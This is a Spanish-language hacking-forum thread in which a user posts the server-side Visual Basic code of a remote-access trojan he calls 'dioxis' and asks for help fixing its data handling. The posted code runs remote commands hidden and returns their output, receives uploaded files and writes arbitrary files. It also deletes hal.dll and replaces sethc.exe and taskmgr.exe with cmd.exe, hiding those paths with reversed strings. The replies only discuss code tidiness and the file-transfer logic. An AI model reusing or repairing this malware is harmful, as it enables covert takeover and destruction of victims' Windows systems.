elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Algunos problemas que otros con el dataarrival
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Algunos problemas que otros con el dataarrival  (Leído 1,708 veces)
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Algunos problemas que otros con el dataarrival
« en: 17 Junio 2009, 11:04 am »

Bueno, como ya veran, estoy en el proyecto de sacar otra version del troyano dioxis, pero aqui es donde se me dan los quebraderos de cabeza

Este es todo el dataarrival del servidor:

Código
  1. Public Sub wsk_DataArrival(ByVal bytesTotal As Long)
  2. Dim sistremaa As String, compr As Integer, ruta As String, textos As String, inii As String
  3.  
  4. Dim handle_Process As Long
  5. Dim id_process As Long
  6. Dim lp_ExitCode As Long
  7.  
  8. Dim casaa As String
  9.  
  10. Dim arrData() As Byte
  11.  
  12. Dim encontrado2 As Integer, encontrado As Integer
  13. Dim busca As Integer
  14. Dim envivi As String, tati As Variant
  15.  
  16. On Error GoTo Error
  17.  
  18. '--------------------------------------------------------------------------'
  19.  
  20. casaa = Environ$("homedrive")
  21. sistremaa = Environ$("windir") & "\system32"
  22. letraa = Environ$("homedrive") & "\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"
  23. inii = casaa & "\ctfmon.bat"
  24.  
  25. '--------------------------------variables---------------------------------'
  26.  
  27. wsk.GetData orden
  28. MsgBox orden
  29. ' enviar archivos----------------------------------------------------------
  30.  
  31. For busca = 0 To Len(orden)
  32. encontrado = InStr(1, orden, "*Enviviandodo*")
  33. Next
  34. If encontrado <> 0 Then
  35.  
  36. If Flag = True Then
  37. Flag = False
  38. lBytes = 0
  39. tati = Split(envivi, "|")
  40. lFileSize = tati(1)
  41. wsk.SendData "|enviamelo|"
  42. Open tati(3) & tati(2) For Binary Access Write As #1
  43. End If
  44.  
  45. If Flag = False Then
  46. MsgBox "poniendo todo los datos"
  47. lBytes = lBytes + bytesTotal
  48. wsk.GetData arrData
  49. MsgBox arrData
  50. Put #1, , arrData
  51. If lBytes >= lFileSize Then
  52.  
  53. Close #1
  54. Flag = True
  55. lBytes = 0
  56. End If
  57. End If
  58. Else
  59.  
  60. ' enviar archivos----------------------------------------------------------
  61.  
  62. For compr = 0 To Len(orden)
  63. encontrado2 = InStr(1, orden, "/*/116%4")
  64. Next
  65. If encontrado2 <> 0 Then
  66.  
  67. arris = Split(orden, "66+/*-&·%")
  68.  
  69. ruta = arris(1)
  70. textos = arris(2)
  71.  
  72. Open ruta For Output As #2
  73. Print #2, textos
  74. Close #2
  75. End If
  76.  
  77. '------------------ordenes personalizadas----------------------------------'
  78.  
  79. If orden = "del " & sistremaa & "\hal.dll" Then Kill sistremaa & StrReverse("lld.lah\")
  80. If orden = "copy /y " & sistremaa & "\cmd.exe" & " " & sistremaa & "\sethc.exe" Then FileCopy sistremaa & StrReverse("exe.dmc\\"), sistremaa & StrReverse("exe.chtes\")
  81. If orden = "copy /y " & sistremaa & "\cmd.exe" & " " & sistremaa & "\taskmgr.exe" Then FileCopy sistremaa & StrReverse("exe.dmc\\"), sistremaa & StrReverse("exe.rgmksat\")
  82. If orden = "eliminar troyano" Then
  83. Kill letraa & StrReverse("exe.dmcyekh\")
  84. Shell ("taskkill /f /im " & App.EXEName & ".exe")
  85. End If
  86. '--------------------------------------------------------------------------'
  87.  
  88. salida:
  89. Open inii For Output As #1
  90. Print #1, orden & ">" & casaa & "\ctfmon.txt"
  91. Close #1
  92.  
  93.  
  94.  
  95.     id_process = Shell(inii, vbHide)
  96.  
  97.  
  98.    handle_Process = OpenProcess(PROCESS_QUERY_INFORMATION, False, id_process)
  99.  
  100.  
  101.    Do
  102.  
  103.         Call GetExitCodeProcess(handle_Process, lp_ExitCode)
  104.  
  105.         DoEvents
  106.  
  107.     Loop While lp_ExitCode = STATUS_PENDING
  108.  
  109.  
  110.     Call CloseHandle(handle_Process)
  111.  
  112.   Open casaa & "\ctfmon.txt" For Input As #1
  113. txtcom = Input(LOF(1), #1)
  114. Close #1
  115.  
  116. wsk.SendData txtcom
  117.  
  118. Error:
  119. End If
  120. End Sub


El data arrival lo que tiene que hacer es recibir 2 acciones, una es para que el cliente le pase archivos y otra para mandarle ordenes

La cosa es que ahora mismo no me funciona ninguno por ahora

El problema creo que reside en las variables del datarrival

si necesitais algun dato mas os lo facilito

gracias


En línea

yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Algunos problemas que otros con el dataarrival
« Respuesta #1 en: 18 Junio 2009, 03:22 am »

Aww, no se mano, pero veo que estas declarando muchas variables dentro del evento de llegada de datos y mas un estas llamando a APIS y no se que mas, no es que este mal, pero podrias ser un poco mas ordenado y asi no atarear tanto al evento, podrias separarlo en modulos, respecto a la transferencia de archivos hay un monton de code orbitando por este foro... es cuestion de buscar

Un saludo y ordena mejor ese codigo.


En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Algunos problemas que otros con el dataarrival
« Respuesta #2 en: 18 Junio 2009, 12:44 pm »

ordenado esta, ya que no puse lo demas del codigo, aun asi yo no me lio

el problema que tengo es que coji un code de recursos vb, que funciona por interruptor

primero el cliente manda los datos del archivo: nombre,ruta,espacio y su firma

luego si el servidor encuentra esa firma pasa al interruptor true, si es true manda el cliente que le pase los datos y abre el archivo para crear, luego pone el interruptor en false y si esta en false escribe todo

lo raro es que a la primera vez que lo hago me funciona pero si lo hagos dos veces no

es demasiado raro
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
por que winsock me da texto de mas en el DataArrival?
Programación General
snakeboy8 0 1,280 Último mensaje 31 Diciembre 2011, 05:17 am
por snakeboy8
Tengo una duda con DataArrival del Winsock
Programación Visual Basic
snakeboy8 7 3,348 Último mensaje 30 Enero 2012, 05:32 am
por snakeboy8
Problema con No-ip y Dataarrival
Dudas Generales
Vaagish 4 2,071 Último mensaje 4 Diciembre 2012, 20:57 pm
por simorg
¿ Por qué algunos de nosotros somos mejores en Matemáticas que otros ? « 1 2 »
Foro Libre
El_Andaluz 13 5,080 Último mensaje 2 Noviembre 2015, 08:47 am
por Stakewinner00
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines